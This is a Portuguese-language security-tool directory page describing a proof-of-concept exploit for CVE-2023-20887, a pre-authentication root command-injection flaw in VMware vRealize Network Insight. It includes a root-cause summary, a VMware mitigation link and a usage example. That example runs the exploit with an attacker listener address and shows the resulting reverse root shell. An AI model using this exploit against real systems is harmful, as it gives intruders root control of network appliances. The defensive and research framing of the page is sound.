Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight RCE Pré-Autenticado (CVE-2023-20887) | Kitploit
Ferramentas/GitHubGitHub/malwareman007/cve-2023-20887
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight RCE Pré-Autenticado (CVE-2023-20887)

Ver Repositório
81há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

CVE-2023-20887

PoC para CVE-2023-20887 VMware Aria Operations for Networks (vRealize Network Insight) RCE não autenticado

Análise Técnica

Uma análise de causa raiz da vulnerabilidade pode ser encontrada no meu blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

Resumo

O VMware Aria Operations for Networks (vRealize Network Insight) é vulnerável a injeção de comandos ao aceitar entrada do usuário através da interface RPC Apache Thrift. Essa vulnerabilidade permite que um atacante remoto não autenticado execute comandos arbitrários no sistema operacional subjacente como usuário root. A interface RPC é protegida por um proxy reverso que pode ser contornado. A VMware avaliou a gravidade desse problema como na faixa de severidade Crítica, com uma pontuação máxima de base CVSSv3 de 9.8. Um ator malicioso pode obter execução remota de código no contexto de 'root' no appliance. As versões 6.x do VMWare são vulneráveis.

Uso

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Mitigações

Atualize para a versão mais recente ou mitigue seguindo as instruções no Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta